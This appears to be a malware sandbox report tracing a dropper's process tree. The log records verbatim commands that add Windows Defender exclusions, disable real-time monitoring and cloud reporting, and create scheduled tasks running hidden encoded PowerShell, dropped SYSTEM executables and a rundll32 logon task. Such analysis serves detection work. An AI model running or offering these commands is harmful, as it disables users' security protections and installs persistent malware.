description pid Process procid_target PID 1048 wrote to memory of 1388 1048 file.exe 27 PID 1048 wrote to memory of 1388 1048 file.exe 27 PID 1048 wrote to memory of 1388 1048 file.exe 27 PID 1048 wrote to memory of 1388 1048 file.exe 27 PID 1048 wrote to memory of 1388 1048 file.exe 27 PID 1048 wrote to memory of 1388 1048 file.exe 27 PID 1048 wrote to memory of 1388 1048 file.exe 27 PID 1388 wrote to memory of 1784 1388 Install.exe 28 PID 1388 wrote to memory of 1784 1388 Install.exe 28 PID 1388 wrote to memory of 1784 1388 Install.exe 28 PID 1388 wrote to memory of 1784 1388 Install.exe 28 PID 1388 wrote to memory of 1784 1388 Install.exe 28 PID 1388 wrote to memory of 1784 1388 Install.exe 28 PID 1388 wrote to memory of 1784 1388 Install.exe 28 PID 1784 wrote to memory of 336 1784 Install.exe 30 PID 1784 wrote to memory of 336 1784 Install.exe 30 PID 1784 wrote to memory of 336 1784 Install.exe 30 PID 1784 wrote to memory of 336 1784 Install.exe 30 PID 1784 wrote to memory of 336 1784 Install.exe 30 PID 1784 wrote to memory of 336 1784 Install.exe 30 PID 1784 wrote to memory of 336 1784 Install.exe 30 PID 1784 wrote to memory of 1256 1784 Install.exe 32 PID 1784 wrote to memory of 1256 1784 Install.exe 32 PID 1784 wrote to memory of 1256 1784 Install.exe 32 PID 1784 wrote to memory of 1256 1784 Install.exe 32 PID 1784 wrote to memory of 1256 1784 Install.exe 32 PID 1784 wrote to memory of 1256 1784 Install.exe 32 PID 1784 wrote to memory of 1256 1784 Install.exe 32 PID 336 wrote to memory of 1544 336 forfiles.exe 34 PID 336 wrote to memory of 1544 336 forfiles.exe 34 PID 336 wrote to memory of 1544 336 forfiles.exe 34 PID 336 wrote to memory of 1544 336 forfiles.exe 34 PID 336 wrote to memory of 1544 336 forfiles.exe 34 PID 336 wrote to memory of 1544 336 forfiles.exe 34 PID 336 wrote to memory of 1544 336 forfiles.exe 34 PID 1256 wrote to memory of 1456 1256 forfiles.exe 35 PID 1256 wrote to memory of 1456 1256 forfiles.exe 35 PID 1256 wrote to memory of 1456 1256 forfiles.exe 35 PID 1256 wrote to memory of 1456 1256 forfiles.exe 35 PID 1256 wrote to memory of 1456 1256 forfiles.exe 35 PID 1256 wrote to memory of 1456 1256 forfiles.exe 35 PID 1256 wrote to memory of 1456 1256 forfiles.exe 35 PID 1456 wrote to memory of 1732 1456 cmd.exe 37 PID 1456 wrote to memory of 1732 1456 cmd.exe 37 PID 1456 wrote to memory of 1732 1456 cmd.exe 37 PID 1456 wrote to memory of 1732 1456 cmd.exe 37 PID 1456 wrote to memory of 1732 1456 cmd.exe 37 PID 1456 wrote to memory of 1732 1456 cmd.exe 37 PID 1456 wrote to memory of 1732 1456 cmd.exe 37 PID 1544 wrote to memory of 1444 1544 cmd.exe 36 PID 1544 wrote to memory of 1444 1544 cmd.exe 36 PID 1544 wrote to memory of 1444 1544 cmd.exe 36 PID 1544 wrote to memory of 1444 1544 cmd.exe 36 PID 1544 wrote to memory of 1444 1544 cmd.exe 36 PID 1544 wrote to memory of 1444 1544 cmd.exe 36 PID 1544 wrote to memory of 1444 1544 cmd.exe 36 PID 1456 wrote to memory of 1204 1456 cmd.exe 38 PID 1456 wrote to memory of 1204 1456 cmd.exe 38 PID 1456 wrote to memory of 1204 1456 cmd.exe 38 PID 1456 wrote to memory of 1204 1456 cmd.exe 38 PID 1456 wrote to memory of 1204 1456 cmd.exe 38 PID 1456 wrote to memory of 1204 1456 cmd.exe 38 PID 1456 wrote to memory of 1204 1456 cmd.exe 38 PID 1544 wrote to memory of 856 1544 cmd.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Users\Admin\AppData\Local\Temp\7zS668.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Users\Admin\AppData\Local\Temp\7zSD2B.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:336 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1544 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1444
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:856
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1256 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1456 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1732
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1204
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gLwvpqCUK" /SC once /ST 09:22:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1968
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gLwvpqCUK"4⤵PID:1480
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gLwvpqCUK"4⤵PID:900
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "beNJzxXkYGhzSCmkZn" /SC once /ST 15:17:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH\MMqPNYIplLDGwAY\FDybrAg.exe\" Qf /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:296
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {E33DB15E-D42F-4D8F-8FBF-F5AEF7FD41A9} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]1⤵PID:1716
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2032 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1084
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1156 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1480
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1732 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1488
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1492 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1132
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:864
-
C:\Windows\system32\taskeng.exetaskeng.exe {655B4600-D646-4CC9-9462-AE1023477ABA} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1060
-
C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH\MMqPNYIplLDGwAY\FDybrAg.exeC:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH\MMqPNYIplLDGwAY\FDybrAg.exe Qf /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1292 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gRvqOXlxV" /SC once /ST 08:22:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1956
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gRvqOXlxV"3⤵PID:1488
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gRvqOXlxV"3⤵PID:304
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:2008
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1112
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1124
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1872
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gzYPrpbeK" /SC once /ST 07:21:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1936
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gzYPrpbeK"3⤵PID:524
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gzYPrpbeK"3⤵PID:1948
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:323⤵PID:432
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1480
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:643⤵PID:1976
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:323⤵PID:324
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:324⤵PID:1592
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:643⤵PID:1084
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:644⤵PID:1124
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\MNBTbrbBidagOXts\BMTvikCF\nZWCSOWCpywleSan.wsf"3⤵PID:1380
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\MNBTbrbBidagOXts\BMTvikCF\nZWCSOWCpywleSan.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1936 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CXdyuXxQU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CXdyuXxQU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCSurMlfClMRC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCSurMlfClMRC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1508
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YnFPtusxCOTU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1724
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YnFPtusxCOTU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bOFQhydRtxUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bOFQhydRtxUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1948
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RIEoyfpemMjlUPVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RIEoyfpemMjlUPVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:864
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH" /t REG_DWORD /d 0 /reg:644⤵PID:684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CXdyuXxQU" /t REG_DWORD /d 0 /reg:324⤵PID:1956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CXdyuXxQU" /t REG_DWORD /d 0 /reg:644⤵PID:1664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCSurMlfClMRC" /t REG_DWORD /d 0 /reg:324⤵PID:1988
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCSurMlfClMRC" /t REG_DWORD /d 0 /reg:644⤵PID:1044
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR" /t REG_DWORD /d 0 /reg:324⤵PID:1964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR" /t REG_DWORD /d 0 /reg:644⤵PID:796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YnFPtusxCOTU2" /t REG_DWORD /d 0 /reg:324⤵PID:1904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YnFPtusxCOTU2" /t REG_DWORD /d 0 /reg:644⤵PID:1828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bOFQhydRtxUn" /t REG_DWORD /d 0 /reg:324⤵PID:832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bOFQhydRtxUn" /t REG_DWORD /d 0 /reg:644⤵PID:1312
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RIEoyfpemMjlUPVB" /t REG_DWORD /d 0 /reg:324⤵PID:1208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RIEoyfpemMjlUPVB" /t REG_DWORD /d 0 /reg:644⤵PID:1704
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH" /t REG_DWORD /d 0 /reg:324⤵PID:668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH" /t REG_DWORD /d 0 /reg:644⤵PID:1372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:324⤵PID:584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:644⤵PID:1984
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gksgGUOXR" /SC once /ST 05:16:18 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:856
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gksgGUOXR"3⤵PID:776
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gksgGUOXR"3⤵PID:960
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1948
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1312
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1656
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GrrjjXtPjBVPFNmZQ" /SC once /ST 03:39:51 /RU "SYSTEM" /TR "\"C:\Windows\Temp\MNBTbrbBidagOXts\wfcQztgHEpfDsSn\eyuqRgg.exe\" 76 /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "GrrjjXtPjBVPFNmZQ"3⤵PID:1600
-
-
-
C:\Windows\Temp\MNBTbrbBidagOXts\wfcQztgHEpfDsSn\eyuqRgg.exeC:\Windows\Temp\MNBTbrbBidagOXts\wfcQztgHEpfDsSn\eyuqRgg.exe 76 /site_id 525403 /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1124 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "beNJzxXkYGhzSCmkZn"3⤵PID:620
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:296
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1548
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1792
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:304
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\CXdyuXxQU\AKyMjU.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ErhcMqZyPKQzNnH" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1884
-
-
